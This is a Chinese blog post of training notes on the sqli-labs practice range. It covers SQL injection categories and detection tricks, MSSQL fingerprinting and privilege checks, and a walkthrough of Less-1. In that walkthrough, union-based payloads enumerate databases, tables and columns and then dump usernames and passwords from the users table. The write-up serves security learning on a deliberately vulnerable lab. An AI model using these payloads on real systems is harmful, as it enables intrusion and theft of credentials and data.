sqli-labs解题笔记~训练篇

最新推荐文章于 2024-05-02 22:32:03 发布
最新推荐文章于 2024-05-02 22:32:03 发布
阅读量516 收藏 3
点赞数 1
分类专栏: sql注入 文章标签: mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YIGAOYU/article/details/108224707
版权

目录

sqli-labs解题笔记~训练篇

前言

经过了两个阶段的过渡,现在可以使用靶场进行训练试试
我所使用的靶场是使用vulstudy搭建的,也可以使用phpstudy搭建线下的靶场。
具体搭建方法不提了,再回顾一下sql注入方式,以及判断方式

sql注入方式

1.报错注入(联合查询)
  1)字符型
  2)数字型
2.报错注入(基于二次注入)
3.盲注
  1)基于布尔值
  2)基于时间
4.UPDATE型注入练习
5.INSERT型注入练
6. HTTP头部注入
 1)基于Referer
 2)基于UserAgent
 3)基于Cookie
7. 二次排序注入练习

判断是否存在sql注入

像这种在url中可以看到?id=……的, 就是get请求,可以在url中看到传递的参数。

简单判定有无漏洞:
粗略型:提交单引号’
逻辑型(数字型注入):and 1=1/and 1=2
逻辑型(字符型注入):'and'1'='1/'and'1'='2
逻辑型(搜索型注入):%'and 1=1 and'%'='%/%'and 1=2 and'%'='%
简单判断数据库信息:
粗略型:
加单引号’(根据服务器报错的信息来判断)
加;--(; 表示分离,– 则是注释符,; 和–MSSQL 数据库有,ACCESS 数据库没有)

逻辑型:
and user>0
and (select count() from msysobjects)>0 ……(页面错误为 access 数据库)
and (select count() from sysobjects)>0 ……(页面正常为 MSSQL 数据库)
and db_name()>0 ……(爆数据库名)
and version>0(爆 SQLServer 版本信息以及服务器操作系统的类型和版本信息)
判断 MSSQL 权限:
and 0<>(Select ISSRVROLEMEMBER('sysadmin'))--(页面正常则为 SA)
and 0<>(Select IS_MEMBER('db_owner'))--(页面正常则为 db_owner)
and 0<>(Select IS_MEMBER('public'))--(页面正常则是 public)

注意:
以上方法适用于参数是 int 数字型的时候。
若为字符型,需在参数后添加单引号’并在查询语句后添加;--,搜索型注入以此类推。

开始训练!

Less-1

在这里插入图片描述
提示输入id参数,输入

?id=1 and 1 = 2 --+

得到正常回显,判断此处不是数字型注入

这时我们在参数后加一个’

?id=1'

在这里插入图片描述
得知这是一个mysql数据库,并且回显不正常,可能存在sql注入漏洞。
同时get参数被‘单引号括在一起。
注释尾部

?id=1' --+

在这里插入图片描述
回显正常,所以此处是字符型注入。

order by子句快速猜解表中的列数
order by 4 --+

在这里插入图片描述

发现到了4列是报错,所以表中只有三列。

union select语句回显
猜解列数还有一种方法如:
'union select 1 --+
'union select 1,2 --+
'union select 1,2,3 --+
......

在这里插入图片描述

一直增加数字,如果字段数和数字的数量不一致的话会显示报错,一直增加到数字到不报错,最后数字的值就是表的列数

已知列数为三列,且有两个显示位
在这里插入图片描述
使用联合查询,查看回显:。

mysql函数
version()				# 获取mysql数据库版本
database()				# 获取当前数据库名
user()					# 获取用户名
current_user()			# 获取当前用户名
system_user()			# 获取系统用户名
@@datadir				# 获取数据库路径
@@version_compile_os	# 获取操作系统版本
爆mysql版本和操作系统信息
?id=-1'union select 1,version(),@@version_compile_os --+

在这里插入图片描述

爆数据库用户名和数据库名
?id=-1'union select 1,user(),database() --+

在这里插入图片描述

爆数据库路径
?id=-1'union select 1,2,@@datadir --+

在这里插入图片描述

显示位空显
null
爆库名
union select 1,null,schema_name from information_schema.schemata limit 0,1 --+			# 爆出一个数据库
union select 1,null,group_concat(schema_name) from information_schema.schemata --+		# 爆出全部数据库

在这里插入图片描述

爆表名
union select 1,null,(select table_name from information_schema.tables where table_schema = database() limit 0,1) --+			# 爆出数据库" security "里的一个表名
union select 1,null,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+			# 爆出数据库" security "里的所有表名

在这里插入图片描述

爆列名
union select 1,null,( select column_name from information_schema.columns where table_schema =database() and table_name='users' limit 0,1) --+				# 从表名" users "中爆出一个字段来
union select 1,null,( select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users' ) --+			# 从表名" users "中爆出全部字段来

在这里插入图片描述

爆数据
union select 1,null,concat(id,0x7e,username,0x7e),password from users limit 0,1 --+					# 从" users "表里对应的列名中爆出一个数据来
union select 1,null,(select group_concat(concat(id,0x7e,username,0x7e,password)) from users) --+		# 从" users "表里对应的列名中爆出所有数据来

在这里插入图片描述

结语

第一关基本就是这样,这次就到这里。

Yuhao~
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
CTFHub闯关之SQL注入
m0_60716947的博客
05-01 3397
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。 CTFHub 地址:CTFHub CTF.
Sqli-labs 1-65关的解题记录(做题思路与简要)
CaesarQu的博客
08-13 3523
Sqli-labs的详细解题记录 Less-1: 进入关卡内先判断是否存在注入情况,先输入?id =1 and 1=1,发现没有变化,换成and 1=2,依旧没有变化,考虑是为字符型而非整形。用 ’ 进行测试,发现页面报错,出现如下显示,证明可以进行SQL注入。 发现为字符型的后先在后面加一个注释符 --+ 可以发现正常返回数据。 此处可以用 order by 对前面的数据进行排列,先进行试数,发现只有三组数据,'order by 4–+就会超出 然后就可以进行union联合注入 然后就可以获取所有
sql-labs通关详解(1-10)
最新发布
guowu666的博客
05-02 543
sqli-labs 1-10通关详解。
Sqli-lab教程-史上最全详解(1-22通关)
qq_52364123的博客
04-10 8388
sql注入集合
SQL注入漏洞(MSSQL注入)
errorr0
07-05 2385
MSSQL注入的入门讲解
Sqli-labs靶场笔记1(Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 407
sqli-labs靶场使用的是mysql数据库,所以在打之前,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs 1~10关教程
jiji_king的博客
04-04 5650
sqlli-labs 1~10关教程 第一关 输入?id=1 出现如下图 输入id=1’ 出现语法错误 表示这里可能出现sql注入漏洞 进一步尝试 输入 id=1’ --+ 发现回显正常 用order by 判断该语句有几列数据 ?id=1’ order by 3 --+ order by 3 回显正常 order by 4 显示错误 证明有三列数据 具体解释见: 于是使用 函数查询,此时要将id=1改为一个数据库不存在的数值 比如888,给后面查询语句留显示位。此时注入语句为: ?id=
SQL注入——sqli-labs最详细1-40闯关指南
热门推荐
爱国小白帽
01-11 3万+
使用sqllabs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqllabs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址中添...
Sqli-Labs靶场(11--16)题解析
weixin_46099095的博客
03-12 2579
十一、Less-11:POST - Error Based - Single quotes - string(POST - 基于错误 - 单引号 - 字符串) 做此题前先复习一个语句: select username,password from users where username=' ' and password=' ' 如果想在不知道数据库账号密码的情况下获取users用户的username,password 可以使用aaa' or 1=1-- +让原本的语句变成: select user
sqli-labs解题大法21~28a
weixin_43733035的博客
01-23 593
Less-21: 第21关,根据前面18关之后的经验,我决定先登录一下试试,然后… 瞬间爆炸了有木有,一堆英文完全看不懂啥意思,不过幸好有百度翻译, emmmm,好像没什么用,该没看懂还是没看懂,不过看到有user-agent和http,就决定先用' and union select 1,2,3#试一下,发现语句会直接输出,并没有注入。 然而,当我在cookie之中写payload时页面出现了...
SQLi-LABS Page-1(Basic Challenges) 解题
qq_51919093的博客
06-11 1034
关于Sqli-labs靶场的搭建,这文章只做解题
Sqli-labs学习第一题
Recar的博客
12-06 1763
很多东西了解一下,然后去用,总会遇到问题,一定不能浅尝辄止,要深入学习下,不能说说,要及时复习,要经常用才不会忘。 一直用 sqlmap,很少手工注入,但是很多时候不是别人写的工具就能解决的,要自己的工具适应不同的场景,编写自己的工具,那么首先要手工流程很熟悉才可以。 决定实践一遍 sqli-lab,还有各大平台的CTF都来一遍。 实践是检验真理的唯一标准http://localhost:90
SQL注入之sqli-labs(九)
m0_60716947的博客
04-30 317
目录 (九)第五十四关到六十五关 (1)第五十四关 (2)第五十五关 (3)第五十六关 (4)第五十七关 (5)第五十八关 (6)第五十九关 (7)第六十关 (8)第六十一关 (9)第六十二关 (10)第六十三关 (11)第六十四关 (12)第六十五关 (十)sqli-labs 总结 (九)第五十四关到六十五关 (1)第五十四关 首页提醒我们使用id 值进行注入,并且告诉我们: 此挑战的目标是在少于 10 次尝试的情况下仅从数据库随机表中转储(“挑战”)的(密钥) 为
SQL注入靶场sqli-labs详细解题记录1-10
Senimo
03-21 1882
SQL注入靶场sqli-labs详细解题记录1-10前言Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8Less-9Less-10 前言 为了更方便的学习,在每关中的index.php文件中填入如下代码: echo $sql; echo'<br>'; 添加在如下位置: // connectivity $sql="SELECT * F...
sqli-labs复现
09-08
要使用PHPStudy搭建SQLi-Labs,您可以按照以下步骤进行操作: 1.下载SQLi-Labs:您可以从GitHub上下载SQLi-Labs的代码并将其解压缩到您的本地计算机上。 2.安装PHPStudy:您可以从PHPStudy官网下载适用于您操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值